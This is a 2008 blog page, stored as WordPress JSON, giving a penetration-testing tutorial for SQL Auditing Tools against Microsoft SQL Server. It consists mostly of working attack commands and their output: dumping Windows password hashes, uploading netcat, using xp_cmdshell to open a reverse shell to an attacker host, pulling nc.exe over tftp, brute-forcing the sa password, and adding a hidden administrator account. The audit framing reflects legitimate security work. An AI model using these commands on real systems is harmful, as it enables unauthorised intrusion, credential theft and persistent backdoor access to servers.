{"id":45,"date":"2008-09-19T11:09:57","date_gmt":"2008-09-19T17:09:57","guid":{"rendered":"http:\/\/www.jedge.com\/wordpress\/?page_id=45"},"modified":"2009-05-14T07:10:00","modified_gmt":"2009-05-14T13:10:00","slug":"sql-auditing-tools","status":"publish","type":"page","link":"https:\/\/www.jedge.com\/wordpress\/sql-auditing-tools\/","title":{"rendered":"SQL Auditing Tools"},"content":{"rendered":"

SQL Auditing Tools [pdf<\/a>]<\/p>\n

Standing upon the shoulders of giants I\u2019ve decided to create a tutorial for the SQL Auditing Tools (SQLAT) building off of what has already been documented <\/a>at www.vulnerabilityassessment.co.uk<\/a> I will not duplicate what is already documented but will instead add additional commands that I have run during an audit that may be useful to you.<\/p>\n

For a description of SQLAT see the developer\u2019s website at http:\/\/www.cqure.net\/wp\/sql-auditing-tools\/<\/a><\/p>\n

INSTALLATION<\/p>\n

Download the SQLAT from http:\/\/www.cqure.net<\/a>. SQLAT requires freetds and optionally pwdump2. The current version (as of this writing is 0.82) of freetds from http:\/\/www.freetds.org<\/a> will not work with SQLAT. The older 0.62.x is required for the tool to configure and compile. Download the version needed from http:\/\/www.jedge.com\/utilities\/freetds-0.62.4.tar.gz<\/a>.<\/p>\n

I was able to successfully install freetds and sqlat on Ubuntu. Your mileage may vary depending on what Linux distribution you are using. For example, I was unable to install the older version of freetds on Fedora. If you are having problems installing sqlat you can still obtain version 2.7.1 of Whoppix<\/a> which has the tool installed for use. Whoppix was an older pentesting distribution based on Knoppix bootable Linux CD. Whoppix became WHAX based on the bootable Slackware called SLAX. Than that project was merged with the Auditors Live CD project and became Backtrack. Just a little pentesting bootable CD history for you.<\/p>\n

To aquire pwdump2 search for it on www.packetstormsecurity.org<\/a> and download it. Netcat will be needed for some of the commands. Acquiring the Linux and Windows versions is outside the scope of this document.<\/p>\n

#tar xzf freetds-0.62.4.tar
\n#cd freeds-0.62.4
\n#.\/configure
\n#make && make install<\/kbd><\/p>\n

#tar zxf SQLAT-src-1.1.0.tar.gz
\n#cd SQLAT-1.1.0
\n#.\/configure
\n#make && make install<\/kbd><\/p>\n

#unzip pwdump2.zip<\/kbd><\/p>\n

EXECUTION<\/p>\n

SQLAT does not play nice with a database that has an sa password set. Many of the commands just don\u2019t work. However, they work fine with a blank sa password set. I will show what you can do when you find a database with a blank sa password. Because during my most recent audit I found a couple databases with blank sa passwords I feel this information is still relevant.<\/p>\n

Use pwdump2 and sqlsamdump to dump the local account password hashes for lookup in the rainbow tables found at http:\/\/rainbowtables.shmoo.com using rainbowcrack.<\/p>\n

root@hacker:~\/SQLAT-1.1.0\/bin# .\/sqlsamdump -i 192.168.10.201 -u sa -T c: -P ..\/..\/pwdump2
\nSQLSamDump by Patrik Karlsson <patrik@cqure.net>
\npwdump : ..\/..\/pwdump2\/pwdump2.exe
\ndll file : ..\/..\/pwdump2\/samdump.dll
\nAdministrator:500:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
\nASPNET:1003:dd453b0d1ecc826518ab1d91b7726f97:90a0811ce84a1faf76a2413f3bfc0b75:::
\nGuest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
\nIUSR_W2K-SERVER-1:1001:2b185aa722d69e8449d5c5f553f7ad8b:39837b51e61efff1a0dbb7d73f3c2b0b:::
\nIWAM_W2K-SERVER-1:1002:f5e0e1d4379b7d2057f8aea87a56dfee:16b6085e5bd1fb535f93f08378241811:::
\nTsInternetUser:1000:5069677e22280a174b21b71db9182b32:4b6649fb61efc9f76d1790e8aeafc367:::
\nTsInternetUser:1000:5069677e22280a174b21b71db9182b32:4b6649fb61efc9f76d1790e8aeafc367:::<\/kbd><\/p>\n

Note: the files pwdump2.exe and samdump.dll will be uploaded to the server in the folder %SYSTEM ROOT%temp.<\/p>\n

Upload Netcat to gain shell access<\/p>\n

root@hacker:~\/sqlat-1.1.0\/bin# .\/sqlupload -v -i 192.168.10.201 -f ..\/..\/nc.exe -T c:\\ -u sa
\nSQLUpload by Patrik Karlsson <patrik@cqure.net><\/kbd><\/p>\n

-- Logging in to 192.168.10.201 --
\nYour file will be in c:
\n-- Uploading ..\/..\/nc.exe --<\/kbd><\/p>\n

On your system run Netcat and have it listen on port 444.<\/p>\n

root@hacker:~\/Desktop# nc -l -p 4444<\/kbd><\/p>\n

Run a query and use xp_cmdshell to execute the uploaded nc.exe program to connect back to your system.<\/p>\n

root@hacker:~\/sqlat-1.1.0\/bin# .\/sqlquery -i 192.168.10.201 -u sa -q \"xp_cmdshell 'c:\\nc.exe 192.168.10.88 4444 -e cmd.exe'\"
\nSQLExec v1.1.0 by <patrik@cqure.net>
\n------------------------------------------<\/kbd><\/p>\n

Instant shell access<\/kbd><\/p>\n

Microsoft Windows 2000 [Version 5.00.2195]
\n(C) Copyright 1985-1999 Microsoft Corp.<\/kbd><\/p>\n

C:WINNTsystem32><\/kbd><\/p>\n

From there you can add yourself as a user and make yourself administrator.<\/p>\n

C:WINNTsystem32>net user hacker $3cr3t \/add
\nnet user hacker $3cr3t \/add
\nThe command completed successfully.<\/kbd><\/p>\n

C:WINNTsystem32>net localgroup administrators hacker \/add
\nnet localgroup administrators hacker \/add
\nThe command completed successfully.<\/kbd><\/p>\n

C:WINNTsystem32><\/kbd><\/p>\n

Note: If the server is running Norton Antivirus you will not be able to upload the files pwdump2.exe or nc.exe. As you will see below you don\u2019t need to have shell access through Netcat to add yourself as a user to the system.<\/p>\n

If you have a server that has an sa password set you will have to perform a dictionary attack to obtain the password.<\/p>\n

root@hacker:~\/sqlat-1.1.0\/bin# .\/sqldict -i 192.168.10.201 -u users.txt -p passwords.txt
\nIP: 192.168.10.201 User: sa Pass: Asdf999<\/kbd><\/p>\n

From there a lot of the commands don\u2019t work due to bugs in the software. However you can use sqlquery to connect and run queries. Through the use of xp_cmdshell you can transfer nc.exe and connect back to your system. It is similar to earlier but all done through sqlquery.<\/p>\n

Note: you need to have a functioning tftp server on your workstation with nc.exe in the tftp root folder before proceeding.<\/p>\n

root@hacker:~\/sqlat-1.1.0\/bin# .\/sqlquery -i 192.168.10.201 -u sa -p Asdf999
\nSQLExec v1.1.0 by <patrik@cqure.net>
\n------------------------------------------
\nsqlexec> xp_cmdshell 'tftp -i 192.168.10.88 GET nc.exe'
\noutput
\nTransfer successful: 28160 bytes in 1 second, 28160 bytes\/s
\nTransfer successful: 28160 bytes in 1 second, 28160 bytes\/s
\nsqlexec> xp_cmdshell 'nc.exe 192.168.10.88 4444 -e cmd.exe'
\noutput<\/kbd><\/p>\n

Again if you are unable to upload nc.exe due to Norton Antivirus you can still add yourself as an administrative user.<\/p>\n

sqlexec> xp_cmdshell 'net user hacker $3cr3t \/add'
\noutput
\nThe command completed successfully.
\nThe command completed successfully.
\nThe command completed successfully.
\nsqlexec> xp_cmdshell 'net localgroup administrators hacker \/add'
\noutput
\nThe command completed successfully.
\nThe command completed successfully.
\nThe command completed successfully.
\nsqlexec><\/kbd><\/p>\n

Once you have a local administror account you can attempt to gain additional access to the domain by following the steps outlined in this tutorial<\/a>.<\/p>\n","protected":false},"excerpt":{"rendered":"

SQL Auditing Tools [pdf] Standing upon the shoulders of giants I\u2019ve decided to create a tutorial for the SQL Auditing Tools (SQLAT) building off of what has already been documented at www.vulnerabilityassessment.co.uk I will not duplicate what is already documented but will instead add additional commands that I have run during an audit that may […]<\/p>\n","protected":false},"author":1,"featured_media":0,"parent":0,"menu_order":0,"comment_status":"closed","ping_status":"closed","template":"","meta":{"_monsterinsights_skip_tracking":false,"_monsterinsights_sitenote_active":false,"_monsterinsights_sitenote_note":"","_monsterinsights_sitenote_category":0,"footnotes":""},"class_list":["post-45","page","type-page","status-publish","hentry"],"_links":{"self":[{"href":"https:\/\/www.jedge.com\/wordpress\/wp-json\/wp\/v2\/pages\/45","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/www.jedge.com\/wordpress\/wp-json\/wp\/v2\/pages"}],"about":[{"href":"https:\/\/www.jedge.com\/wordpress\/wp-json\/wp\/v2\/types\/page"}],"author":[{"embeddable":true,"href":"https:\/\/www.jedge.com\/wordpress\/wp-json\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"https:\/\/www.jedge.com\/wordpress\/wp-json\/wp\/v2\/comments?post=45"}],"version-history":[{"count":13,"href":"https:\/\/www.jedge.com\/wordpress\/wp-json\/wp\/v2\/pages\/45\/revisions"}],"predecessor-version":[{"id":111,"href":"https:\/\/www.jedge.com\/wordpress\/wp-json\/wp\/v2\/pages\/45\/revisions\/111"}],"wp:attachment":[{"href":"https:\/\/www.jedge.com\/wordpress\/wp-json\/wp\/v2\/media?parent=45"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}